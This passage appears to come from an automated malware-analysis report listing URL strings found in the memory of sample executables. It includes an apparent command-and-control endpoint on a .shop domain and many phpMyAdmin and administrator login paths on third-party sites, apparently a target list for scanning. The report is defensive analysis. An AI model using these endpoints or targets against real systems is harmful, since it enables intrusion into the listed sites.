                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/virtual-backgrounds/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/zoom-esg/
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/error/404
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/events
                Source: 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/join
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/signin
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/signup
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/test
                Source: 572.exe, 00000009.00000003.3906194985.00000000641A1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.00000000641A1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3906194985.00000000640F3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/douglascrockford/JSON-js
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/js-cookie/js-cookie
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.pardot.com/l/84442/2015-07-14/4xht
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.pardot.com/l/84442/2015-07-23/mv5y
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.pardot.com/l/84442/2015-07-23/mw5t
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.pardot.com/l/84442/2015-10-23/mspcv
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gr.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/firebasejs/4.13.0/firebase.js
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hartico.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hartico.com/phpmyadmin/8nK
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hartico.tv/admin.php
                Source: 572.exe, 00000009.00000003.4387562949.00000000403E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hartico.tv/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.imvu.com/s/discussions
                Source: 572.exe, 00000009.00000003.3906194985.00000000641A1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.00000000640D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3906194985.00000000640F3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4224252877.00000000640D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.live.com/
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4572467958.000000000595D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.warriorplus.com/
                Source: 572.exe, 00000009.00000003.4307717822.0000000005997000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hero-wars.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hero-wars.com/phpmyadmin/1
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hotfix-dot-snap-profile-manager.snapchat.com
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hr.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.bcicdn.com/favicon/bc/og-image.png
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://idp.uitgeverij-deviant.nl/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://idp.uitgeverij-deviant.nl/phpmyadmin/~
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iframe.arkoselabs.com
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://il.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images.ctfassets.net
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
                Source: 572.exe, 00000009.00000003.4390567048.00000000391D7000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js
                Source: 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innovationdevelopment.eu/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innovationdevelopment.eu/phpmyadmin/Bd
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://innovationdevelopment.eu/phpmyadmin/yd
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructory.net
                Source: 572.exe, 00000009.00000003.4337138614.000000004DAE5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructory.net/administrator/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructory.net/administrator/BD
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructory.net/assets/images/instructory.jpg
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructory.net/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructory.net/phpmyadmin/in/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instructory.net/phpmyadmin/q
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://investors.zoom.us/
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://it.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jp.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.3906194985.00000000641A1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.00000000640D3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4224252877.00000000640D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.js
                Source: 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://js.stripe.com/v3/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kamgarsetu.mp.gov.in/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kamgarsetu.mp.gov.in/phpmyadmin/min/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kamgarsetu.mp.gov.in/phpmyadmin/vF
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keepmb.com
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kit.fontawesome.com/2c6badc2d3.js
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kr.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4337138614.000000004DACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kwyk.fr/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learn-zoom.us/show-me
                Source: 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learn.content.blackboardcdn.com/3900.84.0-rel.31
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://learning.zoom.us/learn
                Source: FE8B.exe, 00000007.00000002.2647046758.0000000001124000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://liabilityarrangemenyit.shop/
                Source: FE8B.exe, 00000007.00000002.2647046758.0000000001135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://liabilityarrangemenyit.shop/a
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.0000000001135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://liabilityarrangemenyit.shop/api
                Source: FE8B.exe, 00000007.00000003.2450711514.0000000001133000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://liabilityarrangemenyit.shop/apiT
                Source: FE8B.exe, 00000007.00000002.2647046758.0000000001135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://liabilityarrangemenyit.shop/apic
                Source: FE8B.exe, 00000007.00000002.2647046758.0000000001135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://liabilityarrangemenyit.shop/piW
                Source: FE8B.exe, 00000007.00000002.2647046758.0000000001135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://liabilityarrangemenyit.shop:443/api
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://log-gateway.zoom.us/nws/join/logger/felog
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4523052924.000000004E0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.adf.ly/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.adf.ly/administrator/index.phpstrator/HF
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://phonandroid.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://phonandroid.com/phpmyadmin/8
                Source: 572.exe, 00000009.00000003.4003323359.00000000390E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pl.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: explorer.exe, 00000002.00000000.2127512556.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://preproduction-dot-snap-profile-manager.snapchat.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profile-preprod.snapchat.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profile.snapchat.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profile.softserve-local-prod.snap-dev.net
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://profit.io/profitcast
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/about/IMVU_MediaKit_2014.pdf
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/avatar/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/catalog/web_help_center.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/catalog/web_safety_tips01.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/creatorlanding/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/groups/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/jobs/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/next/download/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/next/earn_credits/featured/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/next/policyhub/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/people/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/rooms/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.imvu.com/shop/
                Source: 572.exe, 00000009.00000003.4337138614.000000004DAD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.secure.imvu.com
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.secure.imvu.com/next/?source=banner
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pt.secure.imvu.com/phpmyadmin/
